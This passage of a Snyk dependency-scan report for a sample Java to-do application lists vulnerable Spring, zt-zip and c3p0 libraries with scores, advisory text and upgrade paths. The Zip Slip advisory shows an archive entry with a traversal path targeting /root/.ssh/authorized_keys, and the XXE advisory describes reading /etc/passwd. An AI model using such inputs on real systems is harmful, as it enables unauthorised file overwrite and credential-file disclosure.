attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. 
For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.22.RELEASE", + "org.springframework:spring-beans@5.2.22.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, 
+ "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of 
Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "title": "Arbitrary File Write via Archive Extraction (Zip Slip)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "credit": [ + "Snyk Security research Team" + ], + "semver": { + "vulnerable": [ + "[,1.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "filePath": "org/zeroturnaround/zip/ZipUtil$Unpacker.java", + "className": "ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.zeroturnaround:zt-zip", + "references": [ + { + "url": "https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/snyk/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + }, + { + "url": "https://security.snyk.io/research/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:19.847161Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "description": "## Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n## Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n## Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n## References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n", + "epssDetails": { + "percentile": "0.34705", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1002201" + ], + "CWE": [ + "CWE-29" + ] + }, + "packageName": "org.zeroturnaround:zt-zip", + "proprietary": true, + "creationTime": "2018-05-30T12:32:02.349000Z", + "functions_new": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "className": "org.zeroturnaround.zip.ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-04-17T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.zeroturnaround", + "artifactId": "zt-zip" + }, + "publicationTime": "2018-05-31T07:32:02Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:21.493786Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"org.zeroturnaround:zt-zip@1.12" + ], + "upgradePath": [ + false, + "org.zeroturnaround:zt-zip@1.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.zeroturnaround:zt-zip", + "version": "1.12" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": 
"org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final" + 
}, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2" + } + ], + "ok": false, + "dependencyCount": 60, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": 
"high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "157 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": 
"2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
